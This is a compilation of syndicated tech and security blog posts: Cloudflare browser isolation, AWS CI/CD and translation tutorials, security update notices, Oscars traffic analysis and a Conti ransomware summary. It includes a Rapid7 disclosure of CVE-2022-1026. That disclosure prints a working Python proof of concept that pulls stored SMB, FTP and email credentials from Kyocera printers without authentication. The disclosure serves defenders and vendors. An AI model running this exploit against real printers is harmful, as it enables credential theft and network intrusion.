CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/cve-2022-1096-zero-trust-protection-from-zero-day-browser-vulnerabilities/

CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

On Friday, March 25, 2022, Google published an emergency security update for all Chromium-based web browsers to patch a high severity vulnerability (CVE-2022-1096). At the time of writing, the specifics of the vulnerability are restricted until the majority of users have patched their local browsers.

It is important everyone takes a moment to update their local web browser. It’s one quick and easy action everyone can contribute to the cybersecurity posture of their team.

Even if everyone updated their browser straight away, this remains a reactive measure to a threat that existed before the update was available. Let’s explore how Cloudflare takes a proactive approach by mitigating the impact of zero day browser threats with our zero trust and remote browser isolation services. Cloudflare’s remote browser isolation service is built from the ground up to protect against zero day threats, and all remote browsers on our global network have already been patched.

How Cloudflare Zero Trust protects against browser zero day threats

Cloudflare Zero Trust applies a layered defense strategy to protect users from zero day threats while browsing the Internet:

  1. Cloudflare’s roaming client steers Internet traffic over an encrypted tunnel to a nearby Cloudflare data center for inspection and filtration.
  2. Cloudflare’s secure web gateway inspects and filters traffic based on our network intelligence, antivirus scanning and threat feeds. Requests to known malicious services are blocked and high risk or unknown traffic is automatically served by a remote browser.
  3. Cloudflare’s browser isolation service executes all website code in a remote browser to protect unpatched devices from threats inside the unknown website.
CVE-2022-1096: How Cloudflare Zero Trust provides protection from zero day browser vulnerabilities

Protection from the unknown

Zero day threats are often exploited and exist undetected in the real world and actively target users through risky links in emails or other external communication points such as customer support tickets. This risk cannot be eliminated, but it can be reduced by using remote browser isolation to minimize the attack surface. Cloudflare’s browser isolation service is built from the ground up to protect against zero day threats:

  • Prevent compromised web pages from affecting the endpoint device by executing all web code in a remote browser that is physically isolated from the endpoint device. The endpoint device only receives a thin HTML5 remoting shell from our network and vector draw commands from the remote browser.
  • Mitigate the impact of compromise by automatically destroying and reconstructing remote browsers back to a known clean state at the end of their browser session.
  • Protect adjacent remote browsers by encrypting all remote browser egress traffic, segmenting remote browsers with virtualization technologies and distributing browsers across physical hardware in our global network.
  • Aiding Security Incident Response (SIRT) teams by logging all remote egress traffic in the integrated secure web gateway logs.

Patching remote browsers around the world

Even with all these security controls in place, patching browsers remains critical to eliminate the risk of compromise. The process of patching local and remote browsers tells two different stories that can be the difference between compromise, and avoiding a zero day vulnerability.

Patching your workforces local browsers requires politely asking users to interrupt their work to update their browser, or apply mobile device management techniques to disrupt their work by forcing an update. Neither of these options create happy users, or deliver rapid mitigation.

Patching remote browsers is a fundamentally different process. Since the remote browser itself is running on our network, Users and Administrators do not need to intervene as security patches are automatically deployed to remote browsers on Cloudflare’s network. Then without a user restarting their local browser, any traffic to an isolated website is automatically served from a patched remote browser.

Finally, browser based vulnerabilities such as CVE-2022-1096 are not uncommon. With over 300 in 2021 and over 40 already in 2022 (according to cvedetails.com) it is critical for administrators to have a plan to rapidly mitigate and patch browsers in their organization.

Get started with Cloudflare Browser Isolation

Cloudflare Browser Isolation is available to both self serve and enterprise customers. Whether you’re a small startup or a massive enterprise, our network is ready to serve fast and secure remote browsing for your team, no matter where they are based.

To get started, visit our website and, if you’re interested in evaluating Browser Isolation, ask our team for a demo with our Clientless Web Isolation.

Integrating with GitHub Actions – CI/CD pipeline to deploy a Web App to Amazon EC2

Post Syndicated from Mahesh Biradar original https://aws.amazon.com/blogs/devops/integrating-with-github-actions-ci-cd-pipeline-to-deploy-a-web-app-to-amazon-ec2/

Many Organizations adopt DevOps Practices to innovate faster by automating and streamlining the software development and infrastructure management processes. Beyond cultural adoption, DevOps also suggests following certain best practices and Continuous Integration and Continuous Delivery (CI/CD) is among the important ones to start with. CI/CD practice reduces the time it takes to release new software updates by automating deployment activities. Many tools are available to implement this practice. Although AWS has a set of native tools to help achieve your CI/CD goals, it also offers flexibility and extensibility for integrating with numerous third party tools.

In this post, you will use GitHub Actions to create a CI/CD workflow and AWS CodeDeploy to deploy a sample Java SpringBoot application to Amazon Elastic Compute Cloud (Amazon EC2) instances in an Autoscaling group.

GitHub Actions is a feature on GitHub’s popular development platform that helps you automate your software development workflows in the same place that you store code and collaborate on pull requests and issues. You can write individual tasks called actions, and then combine them to create a custom workflow. Workflows are custom automated processes that you can set up in your repository to build, test, package, release, or deploy any code project on GitHub.

AWS CodeDeploy is a deployment service that automates application deployments to Amazon EC2 instances, on-premises instances, serverless AWS Lambda functions, or Amazon Elastic Container Service (Amazon ECS) services.

Solution Overview

The solution utilizes the following services:

  1. GitHub Actions – Workflow Orchestration tool that will host the Pipeline.
  2. AWS CodeDeploy – AWS service to manage deployment on Amazon EC2 Autoscaling Group.
  3. AWS Auto Scaling – AWS Service to help maintain application availability and elasticity by automatically adding or removing Amazon EC2 instances.
  4. Amazon EC2 – Destination Compute server for the application deployment.
  5. AWS CloudFormation – AWS infrastructure as code (IaC) service used to spin up the initial infrastructure on AWS side.
  6. IAM OIDC identity provider – Federated authentication service to establish trust between GitHub and AWS to allow GitHub Actions to deploy on AWS without maintaining AWS Secrets and credentials.
  7. Amazon Simple Storage Service (Amazon S3) – Amazon S3 to store the deployment artifacts.

The following diagram illustrates the architecture for the solution:

Architecture Diagram

  1. Developer commits code changes from their local repo to the GitHub repository. In this post, the GitHub action is triggered manually, but this can be automated.
  2. GitHub action triggers the build stage.
  3. GitHub’s Open ID Connector (OIDC) uses the tokens to authenticate to AWS and access resources.
  4. GitHub action uploads the deployment artifacts to Amazon S3.
  5. GitHub action invokes CodeDeploy.
  6. CodeDeploy triggers the deployment to Amazon EC2 instances in an Autoscaling group.
  7. CodeDeploy downloads the artifacts from Amazon S3 and deploys to Amazon EC2 instances.

Prerequisites

Before you begin, you must complete the following prerequisites:

  • An AWS account with permissions to create the necessary resources.
  • A GitHub account with permissions to configure GitHub repositories, create workflows, and configure GitHub secrets.
  • A Git client to clone the provided source code.

Steps

The following steps provide a high-level overview of the walkthrough:

  1. Clone the project from the AWS code samples repository.
  2. Deploy the AWS CloudFormation template to create the required services.
  3. Update the source code.
  4. Setup GitHub secrets.
  5. Integrate CodeDeploy with GitHub.
  6. Trigger the GitHub Action to build and deploy the code.
  7. Verify the deployment.

Download the source code

  1. Clone the source code repository aws-codedeploy-github-actions-deployment.

git clone https://github.com/aws-samples/aws-codedeploy-github-actions-deployment.git

  1. Create an empty repository in your personal GitHub account. To create a GitHub repository, see Create a repo. Clone this repo to your computer. Furthermore, ignore the warning about cloning an empty repository.

git clone https://github.com/<username>/<repoName>.git

Figure2: Github Clone

  1. Copy the code. We need contents from the hidden .github folder for the GitHub actions to work.

cp -r aws-codedeploy-github-actions-deployment/. <new repository>

e.g. GitActionsDeploytoAWS

  1. Now you should have the following folder structure in your local repository.

Figure3: Directory Structure

Repository folder structure

  • The .github folder contains actions defined in the YAML file.
  • The aws/scripts folder contains code to run at the different deployment lifecycle events.
  • The cloudformation folder contains the template.yaml file to create the required AWS resources.
  • Spring-boot-hello-world-example is a sample application used by GitHub actions to build and deploy.
  • Root of the repo contains appspec.yml. This file is required by CodeDeploy to perform deployment on Amazon EC2. Find more details here.

The following commands will help make sure that your remote repository points to your personal GitHub repository.

git remote remove origin

git remote add origin <your repository url>

git branch -M main

git push -u origin main

Deploy the CloudFormation template

To deploy the CloudFormation template, complete the following steps:

  1. Open AWS CloudFormation console. Enter your account ID, user name, and Password.
  2. Check your region, as this solution uses us-east-1.
  3. If this is a new AWS CloudFormation account, select Create New Stack. Otherwise, select Create Stack.
  4. Select Template is Ready
  5. Select Upload a template file
  6. Select Choose File. Navigate to template.yml file in your cloned repository at “aws-codedeploy-github-actions-deployment/cloudformation/template.yaml”.
  7. Select the template.yml file, and select next.
  8. In Specify Stack Details, add or modify the values as needed.
    • Stack name = CodeDeployStack.
    • VPC and Subnets = (these are pre-populated for you) you can change these values if you prefer to use your own Subnets)
    • GitHubThumbprintList = 6938fd4d98bab03faadb97b34396831e3780aea1
    • GitHubRepoName – Name of your GitHub personal repository which you created.

Figure4: CloudFormation Parameters

  1. On the Options page, select Next.
  2. Select the acknowledgement box to allow for the creation of IAM resources, and then select Create. It will take CloudFormation approximately 10 minutes to create all of the resources. This stack would create the following resources.
    • Two Amazon EC2 Linux instances with Tomcat server and CodeDeploy agent are installed
    • Autoscaling group with Internet Application load balancer
    • CodeDeploy application name and deployment group
    • Amazon S3 bucket to store build artifacts
    • Identity and Access Management (IAM) OIDC identity provider
    • Instance profile for Amazon EC2
    • Service role for CodeDeploy
    • Security groups for ALB and Amazon EC2

Update the source code

  1.  On the AWS CloudFormation console, select the Outputs tab. Note that the Amazon S3 bucket name and the ARM of the GitHub IAM Role. We will use this in the next step.

Figure5: CloudFormation Output

  1. Update the Amazon S3 bucket in the workflow file deploy.yml. Navigate to /.github/workflows/deploy.yml from your Project root directory.

Replace ##s3-bucket## with the name of the Amazon S3 bucket created previously.

Replace ##region## with your AWS Region.

Figure6: Actions YML

  1. Update the Amazon S3 bucket name in after-install.sh. Navigate to aws/scripts/after-install.sh. This script would copy the deployment artifact from the Amazon S3 bucket to the tomcat webapps folder.

Figure7: CodeDeploy Instruction

Remember to save all of the files and push the code to your GitHub repo.

  1. Verify that you’re in your git repository folder by running the following command:

git remote -V

You should see your remote branch address, which is similar to the following:

username@3c22fb075f8a GitActionsDeploytoAWS % git remote -v

origin [email protected]:<username>/GitActionsDeploytoAWS.git (fetch)

origin [email protected]:<username>/GitActionsDeploytoAWS.git (push)

  1. Now run the following commands to push your changes:

git add .

git commit -m “Initial commit”

git push

Setup GitHub Secrets

The GitHub Actions workflows must access resources in your AWS account. Here we are using IAM OpenID Connect identity provider and IAM role with IAM policies to access CodeDeploy and Amazon S3 bucket. OIDC lets your GitHub Actions workflows access resources in AWS without needing to store the AWS credentials as long-lived GitHub secrets.

These credentials are stored as GitHub secrets within your GitHub repository, under Settings > Secrets. For more information, see “GitHub Actions secrets”.

  • Navigate to your github repository. Select the Settings tab.
  • Select Secrets on the left menu bar.
  • Select New repository secret.
  • Select Actions under Secrets.
    • Enter the secret name as ‘IAMROLE_GITHUB’.
    • enter the value as ARN of GitHubIAMRole, which you copied from the CloudFormation output section.

Figure8: Adding Github Secrets

Figure9: Adding New Secret

Integrate CodeDeploy with GitHub

For CodeDeploy to be able to perform deployment steps using scripts in your repository, it must be integrated with GitHub.

CodeDeploy application and deployment group are already created for you. Please use these applications in the next step:

CodeDeploy Application =CodeDeployAppNameWithASG

Deployment group = CodeDeployGroupName

To link a GitHub account to an application in CodeDeploy, follow until step 10 from the instructions on this page.

You can cancel the process after completing step 10. You don’t need to create Deployment.

Trigger the GitHub Actions Workflow

Now you have the required AWS resources and configured GitHub to build and deploy the code to Amazon EC2 instances.

The GitHub actions as defined in the GITHUBREPO/.github/workflows/deploy.yml would let us run the workflow. The workflow is currently setup to be manually run.

Follow the following steps to run it manually.

Go to your GitHub Repo and select Actions tab

Figure10: See Actions Tab

Select Build and Deploy link, and select Run workflow as shown in the following image.

Figure11: Running Workflow Manually

After a few seconds, the workflow will be displayed. Then, select Build and Deploy.

Figure12: Observing Workflow

You will see two stages:

  1. Build and Package.
  2. Deploy.

Build and Package

The Build and Package stage builds the sample SpringBoot application, generates the war file, and then uploads it to the Amazon S3 bucket.

Figure13: Completed Workflow

You should be able to see the war file in the Amazon S3 bucket.

Figure14: Artifacts saved in S3

Deploy

In this stage, workflow would invoke the CodeDeploy service and trigger the deployment.

Figure15: Deploy With Actions

Verify the deployment

Log in to the AWS Console and navigate to the CodeDeploy console.

Select the Application name and deployment group. You will see the status as Succeeded if the deployment is successful.

Figure16: Verifying Deployment

Point your browsers to the URL of the Application Load balancer.

Note: You can get the URL from the output section of the CloudFormation stack or Amazon EC2 console Load Balancers.

Figure17: Verifying Application

Optional – Automate the deployment on Git Push

Workflow can be automated by changing the following line of code in your .github/workflow/deploy.yml file.

From

workflow_dispatch: {}

To


  #workflow_dispatch: {}
  push:
    branches: [ main ]
  pull_request:

This will be interpreted by GitHub actions to automaticaly run the workflows on every push or pull requests done on the main branch.

After testing end-to-end flow manually, you can enable the automated deployment.

Clean up

To avoid incurring future changes, you should clean up the resources that you created.

  1. Empty the Amazon S3 bucket:
  2. Delete the CloudFormation stack (CodeDeployStack) from the AWS console.
  3. Delete the GitHub Secret (‘IAMROLE_GITHUB’)
    1. Go to the repository settings on GitHub Page.
    2. Select Secrets under Actions.
    3. Select IAMROLE_GITHUB, and delete it.

Conclusion

In this post, you saw how to leverage GitHub Actions and CodeDeploy to securely deploy Java SpringBoot application to Amazon EC2 instances behind AWS Autoscaling Group. You can further add other stages to your pipeline, such as Test and security scanning.

Additionally, this solution can be used for other programming languages.

About the Authors

Mahesh Biradar is a Solutions Architect at AWS. He is a DevOps enthusiast and enjoys helping customers implement cost-effective architectures that scale.
Suresh Moolya is a Cloud Application Architect with Amazon Web Services. He works with customers to architect, design, and automate business software at scale on AWS cloud.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/889571/

Security updates have been issued by Debian (libdatetime-timezone-perl, pjproject, and tzdata), Mageia (chromium-browser-stable, docker, graphicsmagick, and libtiff), Oracle (expat), Red Hat (expat, httpd:2.4, openssl, and screen), Scientific Linux (expat and openssl), and Ubuntu (libtasn1-6, linux-oem-5.14, openjdk-lts, and paramiko).

CVE-2022-1026: Kyocera Net View Address Book Exposure

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/

CVE-2022-1026: Kyocera Net View Address Book Exposure

Rapid7 researcher Aaron Henderson has discovered that several models of Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. This vulnerability is an instance of CWE-522: Insufficiently Protected Credentials, and has an estimated base CVSS 3.1 score of 8.6, given that the credentials exposed are used to authenticate to other endpoints, such as external FTP and SMB servers.

Product description

Many Kyocera multifunction printers (MFPs) can be administered using Net Viewer. Two such supported and tested models of MFPs are the ECOSYS M2640idw and the TASKalfa 406ci. These printers can be routinely found in both home office and enterprise environments around the world.

Credit

This issue, CVE-2022-1026, was discovered by security researcher Aaron Henderson of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

Kyocera exposes a SOAP API on port 9091/TCP used for remote printer management via the Net Viewer thick client application. While the API supports authentication, and the thick client performs this authentication, while capturing the SOAP requests, it was observed that the specific request to extract an address book, `POST /ws/km-wsdl/setting/address_book` does not require an authenticated session to submit. Those address books, in turn, contain stored email addresses, usernames, and passwords, which are normally used to store scanned documents on external services or send to users over email.

Exploitation details

In order to exploit the vulnerability, an attacker need only be on a network that can reach the MFP’s listening SOAP service on port 9091/TCP. The screenshot below describes submitting an unauthenticated SOAP request to that service, `POST /ws/km-wsdl/setting/address_book` with the described XML.

CVE-2022-1026: Kyocera Net View Address Book Exposure

This instructs the printer to prepare an address book object to be downloaded containing all sensitive data configured in the address book. The printer will respond with an address book enumeration object number, which is ‘5’ in this instance:

CVE-2022-1026: Kyocera Net View Address Book Exposure

Once that object number is received, an attacker can populate the “<ns1:enumeration>” value with that number in a SOAP request, wsa:Action get_personal_address_list, using the same POST endpoint, as shown below.

CVE-2022-1026: Kyocera Net View Address Book Exposure

This will return the printer address book with all configured email addresses, FTP credentials, and network SMB file share credentials stored for user scanning to network shares, in fairly readable XML:

CVE-2022-1026: Kyocera Net View Address Book Exposure

Finally, credentials can be harvested from the provided login_password fields:

CVE-2022-1026: Kyocera Net View Address Book Exposure

Exploit proof of concept

A proof-of-concept (PoC) Python exploit is shown below. Note the time.sleep(5) call, which allows the printer time to first generate the address book.

PoC Python code:

"""
Kyocera printer exploit
Extracts sensitive data stored in the printer address book, unauthenticated, including:
    *email addresses
    *SMB file share credentials used to write scan jobs to a network fileshare
    *FTP credentials
 
Author: Aaron Herndon, @ac3lives (Rapid7)
Date: 11/12/2021
Tested versions: 
    * ECOSYS M2640idw
    *  TASKalfa 406ci
    * 
 
Usage: 
python3 getKyoceraCreds.py printerip
"""
 
import requests
import xmltodict
import warnings
import sys
import time
warnings.filterwarnings("ignore")
 
url = "https://{}:9091/ws/km-wsdl/setting/address_book".format(sys.argv[1])
headers = {'content-type': 'application/soap+xml'}
# Submit an unauthenticated request to tell the printer that a new address book object creation is required
body = """<?xml version="1.0" encoding="utf-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:create_personal_address_enumerationRequest><ns1:number>25</ns1:number></ns1:create_personal_address_enumerationRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#print(strResponse)
 
 
parsed = xmltodict.parse(strResponse)
# The SOAP request returns XML with an object ID as an integer stored in kmaddrbook:enumeration. We need this object ID to request the data from the printer.
getNumber = parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body']['kmaddrbook:create_personal_address_enumerationResponse']['kmaddrbook:enumeration']
 
body = """<?xml version="1.0" encoding="utf-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><SOAP-ENV:Header><wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action></SOAP-ENV:Header><SOAP-ENV:Body><ns1:get_personal_address_listRequest><ns1:enumeration>{}</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(getNumber)
 
print("Obtained address book object: {}. Waiting for book to populate".format(getNumber))
time.sleep(5)
print("Submitting request to retrieve the address book object...")
 
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#rint(strResponse)
 
parsed = xmltodict.parse(strResponse)
print(parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body'])
 
print("\n\nObtained address book. Review the above response for credentials in objects such as 'login_password', 'login_name'")

Impact

The most likely attack scenario involving this vulnerability would be an attacker, who is already inside the LAN perimeter, leveraging their ability to communicate directly with affected printers to learn the usernames and passwords to stored SMB and FTP file servers. In the case of SMB credentials, those might then be leveraged to establish a presence in the target networks’ Windows domain.

Depending on how those external services are administered, the attacker may also be able to collect prior (and future) print/scan jobs originating from the targeted printer, but the primary value of this vulnerability is lateral movement within the network. Note that printer credentials are not themselves at risk (except in the case of reused passwords, of course), but credentials to services the printer is normally expected to store scanned documents are exposed via this vulnerability.

Remediation

First and foremost, MFPs should under no circumstance be able to be reached directly across the internet. While this is true for most LAN-centric technologies, this is especially true for printers and scanners, which are popular targets for opportunistic attackers. These devices tend to only support weak authentication mechanisms, even in the best of cases, and are rarely kept up to date with firmware updates to address security issues. So, as long as only trusted users can reach these networked printers, the opportunity for attack is limited only to insiders and attackers who have otherwise managed to already establish a local network presence.

At the time of this disclosure, there is no patch or updated firmware available for affected devices. The version information displayed on a vulnerable ECOSYS M2640idw device is shown as below, and we believe the proper version number for this software is the middle version listed, “2S0_1000.005.0012S5_2000.002.505.”

CVE-2022-1026: Kyocera Net View Address Book Exposure

In light of the lack of patching, Kyocera customers are advised to disable the SOAP interface running on port 9091/TCP of affected MFPs. Details on precisely how to disable this service can be found in the documentation relevant to the specific MFP model. If SOAP access is required over the network for normal operation, users should ensure that address books do not contain sensitive, unchanging passwords.

One possible configuration that would make this vulnerability moot would be to only allow public, anonymous FTP or SMB write access (but not read access) for scanned document storage, and another process to move those documents securely across the network to their final destination. The exposure of email addresses would remain, but this is of considerably less value to most attackers.

Disclosure timeline

  • Nov 2021: Issue identified by Aaron Herndon of Rapid7
  • Tue Nov 16, 2021: Contacted Kyocera’s primary support and other-support
  • Fri Nov 19, 2021: Opened case number: CS211119002 with Kyocera support
  • Mon Nov 22, 2021: Released details to the vendor
  • Fri Jan 7, 2022: Opened JPCERT/CC case number JVNVU#96890480
    • Discovered a more reliable security-specific contact at Kyocera
  • Wed Jan 19, 2022: Extended disclosure deadline to mid-March, 2022
  • Jan-Mar 2022: Communication about workarounds and other mitigations
  • Fri Mar 18, 2022: CVE-2022-1026 reserved
  • Tue Mar 29, 2022: Public disclosure (this document)

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

How the Oscars impacted the Internet (at least in the US)

Post Syndicated from João Tomé original https://blog.cloudflare.com/oscars-2022-impact/

How the Oscars impacted the Internet (at least in the US)

How the Oscars impacted the Internet (at least in the US)

The 94th Academy Awards happened this past Sunday, March 27, 2022. In the global event we got to see several Oscars attributed to winners like CODA, Jane Campion (the director of The Power of the Dog) and also Dune (which won six Oscars), but also moments that had a clear impact in the Internet traffic, like the altercation on stage between Will Smith and Chris Rock.

Cloudflare Radar uses a variety of sources to provide aggregate information about Internet traffic and attack trends. In this blog post, we will use DNS name resolution data as a proxy for traffic to Internet services, as we did for the Super Bowl LVI.

The baseline value for the charts (that are only focused on the US) was calculated by taking the mean DNS traffic level for the associated Internet services between 08:00 – 12:00 PST on Sunday (March 27, 2022) — usually we use UTC, but we chose to use Los Angeles time as that’s where the event took place.

The event started with Beyoncé singing at 17:00 PST and ended at around 20:30. In terms of growth in traffic, the start of the show didn’t show much for social media, although TikTok and Twitter started to decrease in DNS requests after that time.

Will Smith makes Twitter and TikTok rise in requests

Twitter and TikTok were the social networks that seemed most impacted by the moment Will Smith went on stage and started an altercation with Chris Rock after a joke.

For Twitter, the major change in DNS requests was exactly after that incident (at 19:25); before that, at 18:00, the moment Sebastián Yatra performed Encanto’s Dos Oruguitas song also had a small spike.

How the Oscars impacted the Internet (at least in the US)

There were 32% more DNS requests for Twitter a few minutes after the altercation, and that growth peaked at 20:15 with 51% more requests than there were at 19:20 — that was after Will Smith (20:05) gave his acceptance and apology speech, when he was awarded the Best Actor Oscar. The ceremony ended at 20:30, and after that traffic went down.

TikTok also seemed to be used during the ceremony and the breaks, and after a spike during one of the commercial breaks, around 18:40, after Troy Kotsur won the Best Supporting Actor Oscar for his role in CODA.

How the Oscars impacted the Internet (at least in the US)

The Will Smith incident seems to be associated with an increase of 20% in requests from 19:20 to 19:30. The trend continued with a 25% increase (19:40) and a peak of 40% more traffic at 20:15, right after Will Smith’s speech. After the ceremony ended (20:30), traffic went down.

Facebook (yellow line) and Instagram (green) weren’t particularly impacted, although there’s a decrease in traffic after the ceremony started and requests start to decrease after 19:00, especially Facebook.

How the Oscars impacted the Internet (at least in the US)

Actresses made IMDb.com tick

One of the main sources of information about the movie industry is IMDb.com, the Internet Movie Database, and traffic to the site was impacted by the Oscars in a way not related to the Will Smith incident. Requests almost doubled (93% increase) in the minutes before the Oscars started (between 16:50 and 17:00).

How the Oscars impacted the Internet (at least in the US)

And there was another clear spike right after Ariana DeBose won (at 17:23) the Best Supporting Actress Oscar for West Side Story, with almost 90% growth in traffic compared to the previous 10 minutes.

There is also an increase at 19:00, when Kenneth Branagh won the Best Original Screenplay Oscar for writing Belfast. The other major spike in traffic, with 55% increase compared to the previous minutes, was right around the time Jessica Chastain got the Oscar for Best Actress for her role in the movie The Eyes of Tammy Faye.

ABC was the official broadcaster for the 2022 Oscars, and throughout the event had good numbers: two hours before the ceremony, ABC.com and also their dedicated page Oscars.com (that redirects to abc.com/shows/oscars) had between 200 to 600% more traffic than in our baseline (the morning period, 08:00 – 12:00 PST).

The biggest spike was around 19:45, a few minutes after the Will Smith incident. This was around the time Questlove received the Best Documentary Oscar for Summer of Soul (…Or, When the Revolution Could Not Be Televised), and there was a reunion for The Godfather, with Francis Ford Coppola and actors Al Pacino and Robert DeNiro, on stage.

How the Oscars impacted the Internet (at least in the US)

Oscars official website

The official Oscars.org website also had some trends worth mentioning. Requests to the site increased 400% in the hour before the ceremony started, from 16:00 to 17:00, and remained high after that.

How the Oscars impacted the Internet (at least in the US)

But at 19:45 there was a clearer spike in traffic of around 1,300% increase compared to the previous 10 minutes — that was 20 minutes after the Will Smith incident, right after Questlove’s Oscar and at the time of The Godfather reunion. There was another spike right after the Best Actress award and before the event ended. The full list of winners was published on Oscars.org right after 20:30.

So, how about the trends for movie news sites like Variety, Hollywood Reporter, Vulture or E Online? For this we went on to look at the whole Oscars week (the baseline is a mean of the previous Sunday, March 20, 2022). The Oscars Sunday, March 27, was definitely the main day of the week, with DNS requests for those websites growing 833% more than the best days of the week.

How the Oscars impacted the Internet (at least in the US)

That growth was even higher the next day, Monday, March 28, 2022, when traffic rose to 1,200% more than the best days of the previous week.

Conclusion

As we saw with the Super Bowl LVI, an out of the ordinary moment in a popular event, even when it’s broadcasted via television, causes changes in social media and Internet traffic. In the case of the Super Bowl LVI it was the Coinbase ad; here it was an unexpected incident on stage.

Other trends like these can be found on the Cloudflare Radar website or via our dedicated Twitter account.

A Detailed Look at the Conti Ransomware Gang

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/a-detailed-look-at-the-conti-ransomware-gang.html

Based on two years of leaked messages, 60,000 in all:

The Conti ransomware gang runs like any number of businesses around the world. It has multiple departments, from HR and administrators to coders and researchers. It has policies on how its hackers should process their code, and shares best practices to keep the group’s members hidden from law enforcement.

Build a multi-language notification system with Amazon Translate and Amazon Pinpoint

Post Syndicated from Praveen Allam original https://aws.amazon.com/blogs/architecture/build-a-multi-language-notification-system-with-amazon-translate-and-amazon-pinpoint/

Organizations with global operations can struggle to notify their customers of any business-related announcements or notifications in different languages. Their customers want to receive notifications in their local language and communication preference. Organizations often rely on complicated third-party services or individuals to manually translate the notifications. This can lead to a loss of revenue due to delayed communication and additional operational expenses.

This blog post demonstrates how to build a straightforward, cost-effective, and scalable multi-language notification system using AWS Serverless technologies. You can post a business-related announcement or notification in English, and based on the customer profile data, it will convert this announcement or notification into different languages. Additionally, the system will also deliver these translated announcements or notifications as an email, voice, or SMS.

Example of a multi-language notification use case

A restaurant franchise company is adding a new item to their menu and plans to release it in North America, Germany, and France. The corporate office has decided to send the following notification.

The company is adding a new item to the menu, and this will go live by May 10. Please ensure you are prepared for this change and plan accordingly.

The franchise owners in Germany want to receive the notifications in the German language, whereas the franchise owners in France want to receive it in French. North American franchises want to receive it in English.

Solution design for multi-language notification system

The solution in Figure 1 demonstrates how to build a multi-language notification system using Amazon Translate and Amazon Pinpoint.

AWS Serverless technologies handle automatic scaling, have built-in high availability architecture, and a pay-for-use billing model, which increases agility and optimizes costs. The system built with this solution is invoked using REST API endpoints. Once this solution is deployed, it can be integrated with any frontend application where users can log in and send out notification events.

Figure 1 illustrates the architecture of this solution.

Solution architecture for multi-language notification system. It includes all the AWS services that are required in this solution. The flow is described as follows.

Figure 1. Solution architecture for multi-language notification system

1. The restaurant franchise will log in to their UI to type the notification message in English. Upon submission, the notification message is sent to the Amazon API Gateway REST endpoint.
Note: In this solution, there is no UI available. You will use a terminal to submit the message.

2. Amazon API Gateway will send this message to Amazon Simple Queue Service (SQS), which will keep the HTTP requests asynchronous.

3. The SQS queue will invoke the SQS AWS Lambda function.

4. The SQS Lambda function invokes the AWS Step Functions state machine. This SQS Lambda function is used as a proxy mechanism to start the state machine workflow. AWS Step Functions are used to orchestrate the notification workflow process. The workflow process validates the message, converts it into different languages, and notifies the customers in their preferred way of communication (email, voice, or SMS). It also handles errors if any of the steps fail by using SQS dead-letter queue.

5. The message entered must be validated in order to ensure that the organizational standards are followed. To perform the message validation, we use the Amazon Comprehend service. Comprehend’s Sentiment analysis will determine whether to send or flag the message. All flagged messages are sent for review.

  • In the example use case message preceding, the message sentiment neutral score is 0.85 confidence. If you set the acceptable score to anything greater than 0.5 confidence, then it is a valid message. Once it passes the validation step, the workflow will proceed to the next step.
  • If the message is vague or not clear, the sentiment score might be less than 0.5 confidence. For example, if this is the message used: We are adding a dish; be ready for it, the sentiment score might be only 0.45 confidence. This is under the acceptable score, and the message will not be processed further.

6. After the message is successfully validated, the message is translated into various languages depending on the customers’ profiles. The Translate Lambda function determines the number of unique languages by referring to the customer profile data in the Amazon DynamoDB table. The function then uses Amazon Translate to translate the message to the different languages required for that notification event. In our example use case, the converted messages will look as follows:

  • German (de):

Das Unternehmen fügt dem Menü einen neuen Punkt hinzu, der bis zum 10. Mai live geschaltet wird. Bitte stellen Sie sicher, dass Sie auf diese Änderung vorbereitet sind und planen Sie entsprechend.

  • French (fr):

La société ajoute un nouvel article au menu, qui sera mis en ligne d’ici le 10 mai. Assurez-vous d’être prêt pour ce changement et de planifier en conséquence.

7. The last step in the workflow is to build the notification logic and deliver the notifications. The Amazon Pinpoint Lambda function retrieves the customer’s profile from the Amazon DynamoDB table. It then parses each record for a given notification event to find out the delivery mode (email, voice, or SMS message). The function then builds the notification logic using Amazon Pinpoint. Amazon Pinpoint notifies each customer either by email, voice, or SMS.

Code repository

